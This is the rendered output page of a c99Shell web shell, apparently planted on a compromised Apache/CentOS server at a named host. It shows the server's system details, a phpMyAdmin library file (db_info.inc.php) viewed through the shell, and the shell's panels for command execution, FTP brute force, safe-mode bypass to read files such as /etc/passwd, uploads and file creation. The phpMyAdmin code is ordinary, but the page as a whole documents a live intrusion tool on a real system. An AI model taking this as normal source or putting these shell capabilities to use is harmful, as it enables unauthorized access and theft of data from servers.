!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     db_info.inc.php (8.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Gets the list of the table in the current db and informations about these
 * tables if possible
 *
 * fills tooltip arrays and provides $tables, $num_tables, $is_show_stats
 * and $db_is_information_schema
 *
 * speedup view on locked tables
 *
 * @uses    $cfg['ShowStats']
 * @uses    $cfg['ShowTooltip']
 * @uses    $cfg['ShowTooltipAliasTB']
 * @uses    $cfg['SkipLockedTables']
 * @uses    $GLOBALS['db']
 * @uses    PMA_fillTooltip()
 * @uses    PMA_checkParameters()
 * @uses    PMA_escape_mysql_wildcards()
 * @uses    PMA_DBI_query()
 * @uses    PMA_backquote()
 * @uses    PMA_DBI_num_rows()
 * @uses    PMA_DBI_fetch_row()
 * @uses    PMA_DBI_fetch_assoc()
 * @uses    PMA_DBI_free_result()
 * @uses    PMA_DBI_get_tables_full()
 * @uses    PMA_isValid()
 * @uses    preg_match()
 * @uses    preg_quote()
 * @uses    uksort()
 * @uses    strnatcasecmp()
 * @uses    count()
 * @uses    addslashes()
 * @package phpMyAdmin
 */
if (! defined('PHPMYADMIN')) {
    exit;
}

/**
 * requirements
 */
require_once './libraries/common.inc.php';

/**
 * limits for table list
 */
if (! isset($_SESSION['tmp_user_values']['table_limit_offset']) || $_SESSION['tmp_user_values']['table_limit_offset_db'] != $db) {
    
$_SESSION['tmp_user_values']['table_limit_offset'] = 0;
    
$_SESSION['tmp_user_values']['table_limit_offset_db'] = $db;
}
if (isset(
$_REQUEST['pos'])) {
    
$_SESSION['tmp_user_values']['table_limit_offset'] = (int) $_REQUEST['pos'];
}
$pos $_SESSION['tmp_user_values']['table_limit_offset'];

/**
 * fills given tooltip arrays
 *
 * @uses    $cfg['ShowTooltipAliasTB']
 * @uses    PMA_localisedDate()
 * @uses    strtotime()
 * @param   array   $tooltip_truename   tooltip data
 * @param   array   $tooltip_aliasname  tooltip data
 * @param   array   $table              tabledata
 */
function PMA_fillTooltip(&$tooltip_truename, &$tooltip_aliasname$table)
{
    if (empty(
$table['Comment'])) {
        
$table['Comment'] = $table['Name'];
    } else {
        
// why?
        
$table['Comment'] .= ' ';
    }

    if (
$GLOBALS['cfg']['ShowTooltipAliasTB']
     && 
$GLOBALS['cfg']['ShowTooltipAliasTB'] != 'nested') {
        
$tooltip_truename[$table['Name']] = $table['Comment'];
        
$tooltip_aliasname[$table['Name']] = $table['Name'];
    } else {
        
$tooltip_truename[$table['Name']] = $table['Name'];
        
$tooltip_aliasname[$table['Name']] = $table['Comment'];
    }

    if (isset(
$table['Create_time']) && !empty($table['Create_time'])) {
        
$tooltip_aliasname[$table['Name']] .= ', ' __('Creation')
             . 
': ' PMA_localisedDate(strtotime($table['Create_time']));
    }

    if (! empty(
$table['Update_time'])) {
        
$tooltip_aliasname[$table['Name']] .= ', ' __('Last update')
             . 
': ' PMA_localisedDate(strtotime($table['Update_time']));
    }

    if (! empty(
$table['Check_time'])) {
        
$tooltip_aliasname[$table['Name']] .= ', ' __('Last check')
             . 
': ' PMA_localisedDate(strtotime($table['Check_time']));
    }
}

PMA_checkParameters(array('db'));

/**
 * @global bool whether to display extended stats
 */
$is_show_stats $cfg['ShowStats'];

/**
 * @global bool whether selected db is information_schema
 */
$db_is_information_schema false;

if (
$db == 'information_schema') {
    
$is_show_stats false;
    
$db_is_information_schema true;
}

/**
 * @global array information about tables in db
 */
$tables = array();

// When used in Nested table group mode, only show tables matching the given groupname
if (PMA_isValid($tbl_group) && !$cfg['ShowTooltipAliasTB']) {
    
$tbl_group_sql ' LIKE "' PMA_escape_mysql_wildcards($tbl_group) . '%"';
} else {
    
$tbl_group_sql '';
}

if (
$cfg['ShowTooltip']) {
    
$tooltip_truename = array();
    
$tooltip_aliasname = array();
}

// Special speedup for newer MySQL Versions (in 4.0 format changed)
if (true === $cfg['SkipLockedTables']) {
    
$db_info_result PMA_DBI_query('SHOW OPEN TABLES FROM ' PMA_backquote($db) . ';');

    
// Blending out tables in use
    
if ($db_info_result && PMA_DBI_num_rows($db_info_result) > 0) {
        while (
$tmp PMA_DBI_fetch_row($db_info_result)) {
            
// if in use memorize tablename
            
if (preg_match('@in_use=[1-9]+@i'$tmp[1])) {
                
$sot_cache[$tmp[0]] = true;
            }
        }
        
PMA_DBI_free_result($db_info_result);

        if (isset(
$sot_cache)) {
            
$db_info_result PMA_DBI_query(
                
'SHOW TABLES FROM ' PMA_backquote($db) . $tbl_group_sql ';',
                
nullPMA_DBI_QUERY_STORE);
            if (
$db_info_result && PMA_DBI_num_rows($db_info_result) > 0) {
                while (
$tmp PMA_DBI_fetch_row($db_info_result)) {
                    if (!isset(
$sot_cache[$tmp[0]])) {
                        
$sts_result  PMA_DBI_query(
                            
'SHOW TABLE STATUS FROM ' PMA_backquote($db)
                             . 
' LIKE \'' addslashes($tmp[0]) . '\';');
                        
$sts_tmp     PMA_DBI_fetch_assoc($sts_result);
                        
PMA_DBI_free_result($sts_result);
                        unset(
$sts_result);

                        if (!isset(
$sts_tmp['Type']) && isset($sts_tmp['Engine'])) {
                            
$sts_tmp['Type'] =& $sts_tmp['Engine'];
                        }

                        if (!empty(
$tbl_group) && $cfg['ShowTooltipAliasTB']
                         && !
preg_match('@' preg_quote($tbl_group'@') . '@i'$sts_tmp['Comment'])) {
                            continue;
                        }

                        if (
$cfg['ShowTooltip']) {
                            
PMA_fillTooltip($tooltip_truename$tooltip_aliasname$sts_tmp);
                        }

                        
$tables[$sts_tmp['Name']]    = $sts_tmp;
                    } else { 
// table in use
                        
$tables[$tmp[0]]    = array('Name' => $tmp[0]);
                    }
                }
                if (
$GLOBALS['cfg']['NaturalOrder']) {
                    
uksort($tables'strnatcasecmp');
                }

                
$sot_ready true;
            } elseif (
$db_info_result) {
                
PMA_DBI_free_result($db_info_result);
            }
            unset(
$sot_cache);
        }
        unset(
$tmp);
    } elseif (
$db_info_result) {
        
PMA_DBI_free_result($db_info_result);
    }
}

if (! isset(
$sot_ready)) {

    
// Set some sorting defaults
    
$sort 'Name';
    
$sort_order 'ASC';

    if (isset(
$_REQUEST['sort'])) {
        
$sortable_name_mappings = array(
            
'table'     => 'Name',
            
'records'   => 'Rows',
            
'type'      => 'Engine',
            
'collation' => 'Collation',
            
'size'      => 'Data_length',
            
'overhead'  => 'Data_free'
        
);

        
// Make sure the sort type is implemented
        
if (isset($sortable_name_mappings[$_REQUEST['sort']])) {
            
$sort $sortable_name_mappings[$_REQUEST['sort']];
            if (
$_REQUEST['sort_order'] == 'DESC') {
                
$sort_order 'DESC';
            }
        }
    }

    if (! empty(
$tbl_group) && ! $cfg['ShowTooltipAliasTB']) {
        
// only tables for selected group
        
$tables PMA_DBI_get_tables_full($db$tbl_grouptruenull0false$sort$sort_order);
    } elseif (! empty(
$tbl_group) && $cfg['ShowTooltipAliasTB']) {
        
// only tables for selected group,
        // but grouping is done on comment ...
        
$tables PMA_DBI_get_tables_full($db$tbl_group'comment'null0false$sort$sort_order);
    } else {
        
// all tables in db
        // - get the total number of tables
        //  (needed for proper working of the MaxTableList feature)
        
$tables PMA_DBI_get_tables($db);
        
$total_num_tables count($tables);
        if (isset(
$sub_part) && $sub_part == '_export') {
            
// (don't fetch only a subset if we are coming from db_export.php,
            // because I think it's too risky to display only a subset of the
            // table names when exporting a db)
            /**
             *
             * @todo Page selector for table names?
             */
            
$tables PMA_DBI_get_tables_full($dbfalsefalsenull0false$sort$sort_order);
        } else {
            
// fetch the details for a possible limited subset
            
$tables PMA_DBI_get_tables_full($dbfalsefalsenull$postrue$sort$sort_order);
        }
    }

    if (
$cfg['ShowTooltip']) {
        foreach (
$tables as $each_table) {
            
PMA_fillTooltip($tooltip_truename$tooltip_aliasname$each_table);
        }
    }
}

/**
 * @global int count of tables in db
 */
$num_tables count($tables);
//  (needed for proper working of the MaxTableList feature)
if (! isset($total_num_tables)) {
    
$total_num_tables $num_tables;
}

/**
 * cleanup
 */
unset($each_table$tbl_group_sql$db_info_result);

/**
 * Displays top menu links
 * If in an Ajax request, we do not need to show this
 */
if($GLOBALS['is_ajax_request'] != true) {
    require 
'./libraries/db_links.inc.php';
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0077 ]--